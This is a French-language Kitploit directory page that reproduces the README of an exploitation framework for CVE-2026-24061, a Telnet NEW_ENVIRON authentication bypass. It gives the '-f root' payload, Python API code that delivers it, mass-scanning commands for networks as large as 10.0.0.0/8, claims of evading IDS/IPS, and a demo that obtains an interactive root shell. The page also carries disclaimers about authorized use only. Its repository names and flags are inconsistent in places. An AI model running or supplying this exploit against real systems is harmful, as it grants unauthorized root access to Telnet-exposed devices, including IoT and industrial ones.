Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Terrminus-CVE-2026-2406 — AsyncIO Scanner & Framework d'exploitation pour CVE-2026-24061 (contournement d'authentification Telnet NEW_ENVIRON). Fonctionnalités : découverte à haute concurrence, empreinte passive et élévation autorisée vers un shell root. | Kitploit
Outils/GitHubGitHub/ridpath/terrminus-cve-2026-2406
Escalade de PrivilègesReconnaissanceScanners de VulnérabilitésSécurité IoTExploitationSécurité SCADA/ICSCollecte d'InformationsSécurité WebSécurité Réseau

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Tests d'Intrusion
Red Teaming
GitHubridpath/terrminus-cve-2026-2406

Terrminus-CVE-2026-2406

AsyncIO Scanner & Framework d'exploitation pour CVE-2026-24061 (contournement d'authentification Telnet NEW_ENVIRON). Fonctionnalités : découverte à haute concurrence, empreinte passive et élévation autorisée vers un shell root.

Voir le dépôt
2il y a 6 moisPas encore vérifié

Terminus - Scanner et cadre d'exploitation CVE-2026-24061

Un moteur d'analyse de sécurité pour la vulnérabilité de contournement d'authentification et d'élévation de privilèges Telnet NEW_ENVIRON CVE-2026-24061.

Terminus


Vue d'ensemble

Terminus est un outil professionnel de recherche en sécurité conçu pour les tests d'intrusion autorisés et l'évaluation de vulnérabilités de CVE-2026-24061. Cette vulnérabilité critique affecte les implémentations héritées du démon Telnet, permettant à des attaquants distants non authentifiés de contourner l'authentification et d'obtenir un accès de niveau root.

Qu'est-ce que CVE-2026-24061 ?

CVE-2026-24061 est une vulnérabilité d'exécution de code à distance dans les services Telnet prenant en charge la RFC 1572 (option d'environnement Telnet). La vulnérabilité exploite une désinfection inappropriée de la variable d'environnement USER lors de la sous-négociation NEW_ENVIRON :

  • Authentification normale : USER=john → invite à saisir un mot de passe
  • Charge utile d'exploitation : USER=-f root → contourne l'authentification, accorde un shell root

Impact :

  • Contournement complet de l'authentification (aucun mot de passe requis)
  • Élévation immédiate des privilèges à root
  • Compromission totale du système

Services concernés :

  • Telnet GNU Inetutils telnetd hérité (notamment les versions jusqu'à 2.7)
  • Micrologiciels IoT avec implémentations Telnet vulnérables
  • Systèmes de contrôle industriels avec services Telnet obsolètes

Fonctionnalités clés

Scanner de vulnérabilités de masse

  • Analyse à haute concurrence : Analyse de plus de 1 000 cibles simultanément à l'aide d'AsyncIO
  • Prise en charge CIDR : Analyse de plages réseau entières (192.168.0.0/24, 10.0.0.0/8)
  • Double mode de détection :
    • Passif (par défaut) : rapide, sûr, détection basée sur les signatures
    • Vérification active (--verify) : preuve d'exploitation, confirme l'accès root uid=0
  • Analyse de bannières : Empreinte des types et versions de démons
  • Score de risque : Évaluation de confiance multicouche (CRITIQUE, ÉLEVÉ, MOYEN, FAIBLE)

Moteur de protocole conforme RFC

  • Classe TerminusNegotiator : API propre pour les opérations du protocole Telnet
    • Terminus.handshake() - poignée de main conforme RFC 854
    • Terminus.exploit() - livraison de la charge utile CVE-2026-24061
  • Négociation d'options appropriée : Évite la détection IDS/IPS grâce à la conformité au protocole
  • Machine à états : Gestion robuste des séquences IAC (DO/DONT/WILL/WONT/SB/SE)

Exploitation contrôlée par autorisation

  • Shell interactif : Shell complet post-exploitation avec accès root
  • Exécution de commandes : Exécution de commandes uniques et capture de la sortie
  • Collecte de preuves : Récupération de l'uid, des variables d'environnement, des informations système
  • Mécanismes de sécurité :
    • Nécessite le drapeau explicite --exploit
    • Désactivé en mode d'analyse par lots
    • Journalisation d'audit de toutes les tentatives d'exploitation

Rapports multi-formats

  • Terminal : Tableaux enrichis avec niveaux de risque codés par couleur
  • JSON : Intégration SIEM/SOAR
  • CSV : Suivi sur feuille de calcul
  • HTML : Rapports détaillés avec statistiques
  • Markdown : Sortie adaptée à la documentation

Architecture

Moteur principal : TerminusNegotiator

Le cœur de Terminus est la classe TerminusNegotiator, qui fournit une séparation claire entre la gestion du protocole et la logique d'exploitation :```python from terminus import TerminusNegotiator

Initialize engine

negotiator = TerminusNegotiator()

Step 1: RFC 854 compliant handshake

await negotiator.handshake(target="192.168.1.100", port=23)

Step 2: Deliver CVE-2026-24061 payload

result = await negotiator.exploit(payload="-f root")

if result.success: print(f"Root shell acquired: {result.evidence['uid']}")

root@kitploit:~
### Approche Moteur vs. Script

**Scripts traditionnels** (outils existants) :```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell

Moteur Terminus :``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report

root@kitploit:~
---

## Installation

### Prérequis
- **Python 3.10+**
- **Plateformes prises en charge :**
  - Windows 10/11 (PowerShell)
  - Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
  - Linux natif (Kali, Parrot, Ubuntu, Debian)
  - macOS (avec Python 3.10+)

### Démarrage rapide (toutes plateformes)

#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version

Linux / WSL2 / macOS (Bash)```bash

Clone repository

git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406

Run setup script

chmod +x setup_env.sh ./setup_env.sh

Activate virtual environment

source venv/bin/activate

Verify installation

terminus --version

root@kitploit:~
#### Installation manuelle (toutes les plateformes)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version

Dépendances (Multi-plateforme)

  • telnetlib3 - Implémentation du protocole Telnet AsyncIO
  • rich - Interface terminal et mise en forme (prise en charge ANSI sur Windows/Linux)
  • pydantic - Validation des données et modèles
  • aiofiles - E/S de fichiers asynchrones
  • jinja2 - Génération de modèles de rapports
  • pyyaml - Gestion de la configuration
  • pathlib - Gestion des chemins multi-plateforme (intégré)

Remarque : Toutes les dépendances sont en Python pur ou disposent de wheels multi-plateformes. Aucune compilation spécifique à une plateforme n'est requise.


Complétion du shell (optionnelle)

Activez la complétion par tabulation pour une saisie de commandes plus rapide :

Bash```bash

_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc

root@kitploit:~
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc

Fish```bash

_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish

root@kitploit:~
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression

Testez-le :```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.

root@kitploit:~
---

## Utilisation

### Modes de numérisation

#### Analyse d'une cible unique```bash
terminus scan -t 192.168.1.100

Scan de plage CIDR```bash

terminus scan -t 192.168.1.0/24

root@kitploit:~
#### Analyse par lots basée sur des fichiers```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

Scan réseau à haute concurrence```bash

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

root@kitploit:~
### Modes de détection

#### Détection passive (par défaut - sûr)```bash
terminus scan -t target.com --passive-only

Détection agressive (toutes les heuristiques)```bash

terminus scan -t target.com --aggressive

root@kitploit:~
#### Mode de vérification active (Preuve d'exploitation)```bash
terminus scan -t 192.168.1.100 --verify

Utilisation

Démonstration en direct

Vérifier la version :```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db

root@kitploit:~
**Analyse passive (par défaut - évaluation des risques prudente) :**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Parsing 1 targets...
Found 1 valid targets

  Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00

╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│   Critical: 0            │
│   High: 0                │
│   Medium: 0              │
│   Low: 1                 │
│   Info: 0                │
│                          │
│ Duration: 3.53s          │
│ Avg Scan Time: 3522.22ms │
│                          │
╰──────────────────────────╯

                                 Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │  Status   │ Risk │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low  │ unknown │ Unknown │     YES     │    -     │       3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

No vulnerable targets found

Vérification active avec --verify (preuve d'exploitation) :```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify

================================================================ TERMINUS CVE-2026-24061 Scanner & Exploitation Framework

Parsing 1 targets... Found 1 valid targets

Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00

╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯

root@kitploit:~
                               Terminus - CVE-2026-24061 Scan Results

╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

Found 1 vulnerable targets!

root@kitploit:~
**Exploitation interactive :**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Attempting exploitation of 172.17.45.122:2323...
Payload: -f root

CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained

[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit

whoami
root
┌──[root@parrot]─[~]
└──╼ #

Observations clés :

  • Mode passif : Détection de NEW_ENVIRON prise en charge mais risque signalé comme FAIBLE (conservateur)
  • Vérification active : Accès root confirmé (uid=0), risque élevé à CRITIQUE avec statut de vérification « ROOT »
  • Exploitation : Shell root immédiat sans invite de mot de passe

Ce qu'il fait :

  • Effectue d'abord une détection passive (bannière + analyse du protocole)
  • Si une vulnérabilité est suspectée, tente une exploitation réelle avec le payload -f root
  • Confirme l'accès root en vérifiant uid=0 dans la réponse
  • Élève le risque à CRITIQUE lorsque l'accès root est confirmé
  • Affiche le statut de vérification dans les résultats d'analyse

Cas d'utilisation :

  • Validation à haute confiance pour les rapports de conformité
  • Démonstrations de preuve de concept
  • Confirmation de l'exploitabilité avant de signaler aux fournisseurs
  • Opérations d'équipe rouge nécessitant la collecte de preuves

Exemple de sortie :``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A

root@kitploit:~
**Vérification par lots :**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json

Remarque : La vérification active implique une exploitation. À utiliser uniquement avec une autorisation appropriée.

Formats de sortie

Sortie JSON```bash

terminus scan -t 192.168.1.0/24 -o json > results.json

root@kitploit:~
#### Rapport HTML```bash
terminus scan -f targets.txt -o html -w report.html

Export CSV```bash

terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv

root@kitploit:~
### Exploitation (Utilisation Autorisée Uniquement)

#### Shell Interactif```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target

Exécution de commandes```bash

terminus exploit -t 192.168.1.100 -c "id"

Output: uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
#### Charge utile personnalisée```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"

Commandes utilitaires

Mise à jour des signatures de vulnérabilités```bash

terminus update-signatures

root@kitploit:~
#### Vérifier les résultats précédents```bash
terminus verify -f results.json

Afficher la version et les signatures```bash

terminus version

root@kitploit:~
---

## Configuration de l'environnement de test

### Pour l'équipe rouge : Déploiement multiplateforme

**Terminus est conçu pour un déploiement portable** - copiez le répertoire sur n'importe quel système Windows/Linux et exécutez-le sans installation :```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative

# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24

# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml

Environnement de test WSL2 (Windows)

Recommandé pour les postes de travail Red Team sous Windows - environnement Linux isolé pour déployer des services de test vulnérables :

Installer WSL2 avec Kali ou Parrot```powershell

Windows PowerShell (Admin)

Install WSL2

wsl --install

Install Kali Linux

wsl --install -d kali-linux

OR Install Parrot OS (if available)

wsl --install -d ParrotOS

Verify

wsl -l -v

root@kitploit:~
#### Dans WSL2 (Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv

# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump

# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate

Déployer un service de test vulnérable (WSL2 uniquement)

ATTENTION : Uniquement dans des environnements de laboratoire isolés. Jamais sur des systèmes de production.```bash

Inside WSL2

Install vulnerable netkit-telnetd version

sudo apt install netkit-telnetd=0.17-*

Configure for NEW_ENVIRON support

Edit /etc/inetd.conf to enable telnet

Start service

sudo systemctl restart inetd

Test from Windows host

From PowerShell:

terminus scan -t $(wsl hostname -I)

root@kitploit:~
### Matrice de test multiplateforme

Testez Terminus sur toutes les plateformes utilisées par votre Red Team :

| Plateforme | Installation | Analyse | Exploitation |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | Oui | Oui | Oui |
| WSL2 - Kali Linux | Oui | Oui | Oui |
| WSL2 - Parrot OS | Oui | Oui | Oui |
| WSL2 - Ubuntu | Oui | Oui | Oui |
| Kali Linux natif | Oui | Oui | Oui |
| Parrot OS natif | Oui | Oui | Oui |
| macOS | Oui | Oui | Oui |

---

## Référence de l'API

### Intégration Python```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore

async def scan_network():
    # High-level scanner
    async with TerminusScanner() as scanner:
        async for result in scanner.scan_targets(["192.168.1.0/24"]):
            if result.risk_score == RiskScore.CRITICAL:
                print(f"CRITICAL: {result.target}")
                print(f"   Daemon: {result.daemon_type} {result.version}")
                print(f"   Confidence: {result.vulnerability_confidence:.2%}")

async def exploit_target():
    # Direct engine usage
    negotiator = TerminusNegotiator()
    
    # Handshake
    success = await negotiator.handshake(target="192.168.1.100", port=23)
    if not success:
        print("Handshake failed")
        return
    
    # Exploit
    result = await negotiator.exploit(payload="-f root")
    if result.success:
        print(f"Root access obtained")
        print(f"Evidence: {result.evidence}")

# Run
asyncio.run(scan_network())

Sécurité et Éthique

Avertissement légal

Cet outil est destiné UNIQUEMENT à :

  • Des tests d'intrusion autorisés
  • De la recherche en sécurité dans des environnements contrôlés
  • Des compétitions CTF et des laboratoires pédagogiques
  • Des évaluations de sécurité défensive avec autorisation écrite

Toute utilisation non autorisée est ILLÉGALE et contraire à l'éthique.

Mécanismes de sécurité

  1. Autorisation requise : L'exploitation nécessite le flag explicite --exploit
  2. Invites de confirmation : Confirmation interactive avant l'exploitation
  3. Journalisation d'audit : Toutes les tentatives d'exploitation sont journalisées avec horodatage
  4. Application de cible unique : Exploitation désactivée en mode scan par lots
  5. Limitation de débit : Empêche les dénis de service accidentels lors du scan

Divulgation responsable

Si vous découvrez des systèmes vulnérables à l'aide de Terminus :

  1. N'exploitez PAS les systèmes sans autorisation écrite
  2. Signalez les résultats aux propriétaires des systèmes via une divulgation responsable
  3. Documentez les résultats à l'aide des fonctionnalités de rapport de Terminus
  4. Suivez les directives de divulgation coordonnée des vulnérabilités

Références

Informations CVE

  • ID CVE : CVE-2026-24061
  • Gravité : CRITIQUE (CVSS 9.8)
  • Vecteur : Réseau, Non authentifié, Complexité faible

Recherche et implémentation

  • Recherche principale : SafeBreach-Labs CVE-2026-24061
  • Exploit de référence : telnet_rce.py
  • Scanner par lots : TryA9ain CVE-2026-24061

Normes de protocole

  • RFC 854 : Spécification du protocole Telnet
  • RFC 1572 : Option d'environnement Telnet

Tests et validation

Couverture des tests

  • Couverture de code à 90 %+ avec pytest
  • Tests unitaires pour tous les modules principaux
  • Tests d'intégration avec serveur Telnet simulé
  • Benchmarks de performance (1 000 cibles < 60 secondes)

Liste de contrôle des tests manuels

  • Scanner un service vulnérable (vérifier la détection)
  • Scanner un service corrigé (vérifier l'absence de faux positif)
  • Tester le contournement d'authentification (aucune invite de mot de passe)
  • Vérifier l'élévation de privilèges (uid=0)
  • Surveiller les alertes IDS (vérifier la furtivité)
  • Test de performance (1 000+ cibles)

Configuration

config.yaml (multi-plateforme)

Tous les chemins sont relatifs à la racine du projet - fonctionne sur Windows, Linux et WSL sans modification :```yaml

config.yaml - Cross-platform configuration

All paths relative to project directory

scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second

detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true

Signature database (relative path)

signatures_db: "./signatures.db"

exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true

reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"

Output directory (relative path - works on Windows/Linux)

output_dir: "./reports"

logging: level: "INFO"

Log file (relative path - automatic directory creation)

file: "./logs/terminus.log" format: "json" console_enabled: true


Acknowledgments

  • SafeBreach Labs: Original CVE-2026-24061 research and exploit implementation
  • TryA9ain: Batch scanning approach inspiration
  • RFC Authors: Telnet protocol specifications

Télécharger l’outil